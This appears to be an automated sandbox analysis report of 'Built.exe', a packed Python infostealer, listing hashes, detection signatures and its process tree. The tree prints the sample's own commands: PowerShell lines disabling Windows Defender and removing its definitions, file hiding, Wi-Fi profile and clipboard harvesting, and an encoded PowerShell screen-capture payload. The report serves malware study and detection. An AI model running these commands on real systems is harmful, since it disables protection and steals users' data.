Analysis
-
max time kernel
144s -
max time network
117s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
26-06-2024 18:05
Behavioral task
behavioral1
Sample
Built.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Built.exe
Resource
win10v2004-20240611-en
General
-
Target
Built.exe
-
Size
6.0MB
-
MD5
a63702c06a401f4dee92ecbfe7e2a289
-
SHA1
3a4f43b4fecc0537b9a7294fdaf716589f3aadfb
-
SHA256
5abca78c05174b85888fba097e89106162261ecdac73f09d035eb22aec3261f6
-
SHA512
5f637e8a8db508d41e92d3d96c12141ef7ac2b396e2fd9c91b5cfb263d41340a1b7863d3d703ecacdc5645d58b7b235d501a42d80269d808dd38049663ea980b
-
SSDEEP
98304:bgXdYMLXqkqMQXhL4afkhk9Y+YNwh1SMCJbzRnPJ8iE/56YSZDJ1n6hBnLnzOc:orsL4ack9Y7m7SMYNPKB8n6hVvF
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 2272 powershell.exe 4392 powershell.exe -
ACProtect 1.3x - 1.4x DLL software 16 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI16282\python311.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_ctypes.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_ssl.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_sqlite3.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_socket.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_queue.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_lzma.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_hashlib.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_decimal.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\_bz2.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\unicodedata.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\sqlite3.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\select.pyd acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\libssl-1_1.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\libcrypto-1_1.dll acprotect C:\Users\Admin\AppData\Local\Temp\_MEI16282\libffi-8.dll acprotect -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 2252 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Built.exepid process 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe 3384 Built.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI16282\python311.dll upx behavioral2/memory/3384-25-0x0000000074E00000-0x000000007530A000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_ctypes.pyd upx behavioral2/memory/3384-30-0x0000000074DB0000-0x0000000074DCF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_queue.pyd upx behavioral2/memory/3384-43-0x0000000074DA0000-0x0000000074DAD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI16282\libffi-8.dll upx behavioral2/memory/3384-54-0x0000000074D70000-0x0000000074D97000-memory.dmp upx behavioral2/memory/3384-57-0x0000000074D50000-0x0000000074D68000-memory.dmp upx behavioral2/memory/3384-58-0x0000000074D30000-0x0000000074D4B000-memory.dmp upx behavioral2/memory/3384-60-0x0000000074BF0000-0x0000000074D26000-memory.dmp upx behavioral2/memory/3384-62-0x0000000074BD0000-0x0000000074BE6000-memory.dmp upx behavioral2/memory/3384-64-0x0000000074B80000-0x0000000074B8C000-memory.dmp upx behavioral2/memory/3384-66-0x0000000074B50000-0x0000000074B78000-memory.dmp upx behavioral2/memory/3384-70-0x0000000074E00000-0x000000007530A000-memory.dmp upx behavioral2/memory/3384-74-0x0000000074DB0000-0x0000000074DCF000-memory.dmp upx behavioral2/memory/3384-73-0x0000000074850000-0x0000000074AAA000-memory.dmp upx behavioral2/memory/3384-71-0x0000000074AB0000-0x0000000074B44000-memory.dmp upx behavioral2/memory/3384-79-0x00000000747D0000-0x00000000747DC000-memory.dmp upx behavioral2/memory/3384-81-0x00000000746A0000-0x00000000747B8000-memory.dmp upx behavioral2/memory/3384-78-0x0000000074D70000-0x0000000074D97000-memory.dmp upx behavioral2/memory/3384-76-0x00000000747E0000-0x00000000747F0000-memory.dmp upx behavioral2/memory/3384-186-0x0000000074D30000-0x0000000074D4B000-memory.dmp upx behavioral2/memory/3384-297-0x0000000074BF0000-0x0000000074D26000-memory.dmp upx behavioral2/memory/3384-341-0x0000000074BD0000-0x0000000074BE6000-memory.dmp upx behavioral2/memory/3384-340-0x00000000746A0000-0x00000000747B8000-memory.dmp upx behavioral2/memory/3384-337-0x0000000074850000-0x0000000074AAA000-memory.dmp upx behavioral2/memory/3384-336-0x0000000074AB0000-0x0000000074B44000-memory.dmp upx behavioral2/memory/3384-335-0x0000000074B50000-0x0000000074B78000-memory.dmp upx behavioral2/memory/3384-332-0x0000000074BF0000-0x0000000074D26000-memory.dmp upx behavioral2/memory/3384-327-0x0000000074DB0000-0x0000000074DCF000-memory.dmp upx behavioral2/memory/3384-326-0x0000000074E00000-0x000000007530A000-memory.dmp upx behavioral2/memory/3384-371-0x0000000074DB0000-0x0000000074DCF000-memory.dmp upx behavioral2/memory/3384-380-0x0000000074AB0000-0x0000000074B44000-memory.dmp upx behavioral2/memory/3384-384-0x00000000746A0000-0x00000000747B8000-memory.dmp upx behavioral2/memory/3384-383-0x00000000747D0000-0x00000000747DC000-memory.dmp upx behavioral2/memory/3384-382-0x00000000747E0000-0x00000000747F0000-memory.dmp upx behavioral2/memory/3384-381-0x0000000074E00000-0x000000007530A000-memory.dmp upx behavioral2/memory/3384-379-0x0000000074B50000-0x0000000074B78000-memory.dmp upx behavioral2/memory/3384-378-0x0000000074B80000-0x0000000074B8C000-memory.dmp upx behavioral2/memory/3384-377-0x0000000074BD0000-0x0000000074BE6000-memory.dmp upx behavioral2/memory/3384-376-0x0000000074BF0000-0x0000000074D26000-memory.dmp upx behavioral2/memory/3384-375-0x0000000074D50000-0x0000000074D68000-memory.dmp upx behavioral2/memory/3384-374-0x0000000074D30000-0x0000000074D4B000-memory.dmp upx behavioral2/memory/3384-373-0x0000000074D70000-0x0000000074D97000-memory.dmp upx behavioral2/memory/3384-372-0x0000000074DA0000-0x0000000074DAD000-memory.dmp upx behavioral2/memory/3384-370-0x0000000074850000-0x0000000074AAA000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 ip-api.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 2376 WMIC.exe 1680 WMIC.exe 4356 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 4084 tasklist.exe 3332 tasklist.exe 1108 tasklist.exe 3820 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4076 powershell.exe 4392 powershell.exe 4076 powershell.exe 4392 powershell.exe 4364 powershell.exe 4364 powershell.exe 2272 powershell.exe 2272 powershell.exe 1136 powershell.exe 1136 powershell.exe 4364 powershell.exe 2272 powershell.exe 1136 powershell.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe 4064 powershell.exe 4064 powershell.exe 4800 powershell.exe 4800 powershell.exe 4800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 2804 WMIC.exe Token: SeSecurityPrivilege 2804 WMIC.exe Token: SeTakeOwnershipPrivilege 2804 WMIC.exe Token: SeLoadDriverPrivilege 2804 WMIC.exe Token: SeSystemProfilePrivilege 2804 WMIC.exe Token: SeSystemtimePrivilege 2804 WMIC.exe Token: SeProfSingleProcessPrivilege 2804 WMIC.exe Token: SeIncBasePriorityPrivilege 2804 WMIC.exe Token: SeCreatePagefilePrivilege 2804 WMIC.exe Token: SeBackupPrivilege 2804 WMIC.exe Token: SeRestorePrivilege 2804 WMIC.exe Token: SeShutdownPrivilege 2804 WMIC.exe Token: SeDebugPrivilege 2804 WMIC.exe Token: SeSystemEnvironmentPrivilege 2804 WMIC.exe Token: SeRemoteShutdownPrivilege 2804 WMIC.exe Token: SeUndockPrivilege 2804 WMIC.exe Token: SeManageVolumePrivilege 2804 WMIC.exe Token: 33 2804 WMIC.exe Token: 34 2804 WMIC.exe Token: 35 2804 WMIC.exe Token: 36 2804 WMIC.exe Token: SeDebugPrivilege 4084 tasklist.exe Token: SeIncreaseQuotaPrivilege 2804 WMIC.exe Token: SeSecurityPrivilege 2804 WMIC.exe Token: SeTakeOwnershipPrivilege 2804 WMIC.exe Token: SeLoadDriverPrivilege 2804 WMIC.exe Token: SeSystemProfilePrivilege 2804 WMIC.exe Token: SeSystemtimePrivilege 2804 WMIC.exe Token: SeProfSingleProcessPrivilege 2804 WMIC.exe Token: SeIncBasePriorityPrivilege 2804 WMIC.exe Token: SeCreatePagefilePrivilege 2804 WMIC.exe Token: SeBackupPrivilege 2804 WMIC.exe Token: SeRestorePrivilege 2804 WMIC.exe Token: SeShutdownPrivilege 2804 WMIC.exe Token: SeDebugPrivilege 2804 WMIC.exe Token: SeSystemEnvironmentPrivilege 2804 WMIC.exe Token: SeRemoteShutdownPrivilege 2804 WMIC.exe Token: SeUndockPrivilege 2804 WMIC.exe Token: SeManageVolumePrivilege 2804 WMIC.exe Token: 33 2804 WMIC.exe Token: 34 2804 WMIC.exe Token: 35 2804 WMIC.exe Token: 36 2804 WMIC.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeIncreaseQuotaPrivilege 2376 WMIC.exe Token: SeSecurityPrivilege 2376 WMIC.exe Token: SeTakeOwnershipPrivilege 2376 WMIC.exe Token: SeLoadDriverPrivilege 2376 WMIC.exe Token: SeSystemProfilePrivilege 2376 WMIC.exe Token: SeSystemtimePrivilege 2376 WMIC.exe Token: SeProfSingleProcessPrivilege 2376 WMIC.exe Token: SeIncBasePriorityPrivilege 2376 WMIC.exe Token: SeCreatePagefilePrivilege 2376 WMIC.exe Token: SeBackupPrivilege 2376 WMIC.exe Token: SeRestorePrivilege 2376 WMIC.exe Token: SeShutdownPrivilege 2376 WMIC.exe Token: SeDebugPrivilege 2376 WMIC.exe Token: SeSystemEnvironmentPrivilege 2376 WMIC.exe Token: SeRemoteShutdownPrivilege 2376 WMIC.exe Token: SeUndockPrivilege 2376 WMIC.exe Token: SeManageVolumePrivilege 2376 WMIC.exe Token: 33 2376 WMIC.exe Token: 34 2376 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Built.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1628 wrote to memory of 3384 1628 Built.exe Built.exe PID 1628 wrote to memory of 3384 1628 Built.exe Built.exe PID 1628 wrote to memory of 3384 1628 Built.exe Built.exe PID 3384 wrote to memory of 2236 3384 Built.exe cmd.exe PID 3384 wrote to memory of 2236 3384 Built.exe cmd.exe PID 3384 wrote to memory of 2236 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1076 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1076 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1076 3384 Built.exe cmd.exe PID 3384 wrote to memory of 3604 3384 Built.exe cmd.exe PID 3384 wrote to memory of 3604 3384 Built.exe cmd.exe PID 3384 wrote to memory of 3604 3384 Built.exe cmd.exe PID 3384 wrote to memory of 3672 3384 Built.exe cmd.exe PID 3384 wrote to memory of 3672 3384 Built.exe cmd.exe PID 3384 wrote to memory of 3672 3384 Built.exe cmd.exe PID 3604 wrote to memory of 4084 3604 cmd.exe tasklist.exe PID 3604 wrote to memory of 4084 3604 cmd.exe tasklist.exe PID 3604 wrote to memory of 4084 3604 cmd.exe tasklist.exe PID 3672 wrote to memory of 2804 3672 cmd.exe WMIC.exe PID 3672 wrote to memory of 2804 3672 cmd.exe WMIC.exe PID 3672 wrote to memory of 2804 3672 cmd.exe WMIC.exe PID 1076 wrote to memory of 4076 1076 cmd.exe powershell.exe PID 1076 wrote to memory of 4076 1076 cmd.exe powershell.exe PID 1076 wrote to memory of 4076 1076 cmd.exe powershell.exe PID 2236 wrote to memory of 4392 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 4392 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 4392 2236 cmd.exe powershell.exe PID 3384 wrote to memory of 1952 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1952 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1952 3384 Built.exe cmd.exe PID 1952 wrote to memory of 2164 1952 cmd.exe reg.exe PID 1952 wrote to memory of 2164 1952 cmd.exe reg.exe PID 1952 wrote to memory of 2164 1952 cmd.exe reg.exe PID 3384 wrote to memory of 400 3384 Built.exe cmd.exe PID 3384 wrote to memory of 400 3384 Built.exe cmd.exe PID 3384 wrote to memory of 400 3384 Built.exe cmd.exe PID 400 wrote to memory of 3720 400 cmd.exe reg.exe PID 400 wrote to memory of 3720 400 cmd.exe reg.exe PID 400 wrote to memory of 3720 400 cmd.exe reg.exe PID 3384 wrote to memory of 1544 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1544 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1544 3384 Built.exe cmd.exe PID 1544 wrote to memory of 2376 1544 cmd.exe WMIC.exe PID 1544 wrote to memory of 2376 1544 cmd.exe WMIC.exe PID 1544 wrote to memory of 2376 1544 cmd.exe WMIC.exe PID 3384 wrote to memory of 1364 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1364 3384 Built.exe cmd.exe PID 3384 wrote to memory of 1364 3384 Built.exe cmd.exe PID 1364 wrote to memory of 1680 1364 cmd.exe WMIC.exe PID 1364 wrote to memory of 1680 1364 cmd.exe WMIC.exe PID 1364 wrote to memory of 1680 1364 cmd.exe WMIC.exe PID 3384 wrote to memory of 4976 3384 Built.exe cmd.exe PID 3384 wrote to memory of 4976 3384 Built.exe cmd.exe PID 3384 wrote to memory of 4976 3384 Built.exe cmd.exe PID 4976 wrote to memory of 2716 4976 cmd.exe cmd.exe PID 4976 wrote to memory of 2716 4976 cmd.exe cmd.exe PID 4976 wrote to memory of 2716 4976 cmd.exe cmd.exe PID 3384 wrote to memory of 4960 3384 Built.exe cmd.exe PID 3384 wrote to memory of 4960 3384 Built.exe cmd.exe PID 3384 wrote to memory of 4960 3384 Built.exe cmd.exe PID 3384 wrote to memory of 4772 3384 Built.exe cmd.exe PID 3384 wrote to memory of 4772 3384 Built.exe cmd.exe PID 3384 wrote to memory of 4772 3384 Built.exe cmd.exe PID 3384 wrote to memory of 3344 3384 Built.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2804 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2164
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3720
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2376 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Views/modifies file attributes
PID:2716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4960
-
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4772
-
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3344
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1676
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:60
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4364 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4068
-
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3836
-
C:\Windows\SysWOW64\tree.comtree /A /F4⤵PID:2836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:1336
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2804
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1736 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdA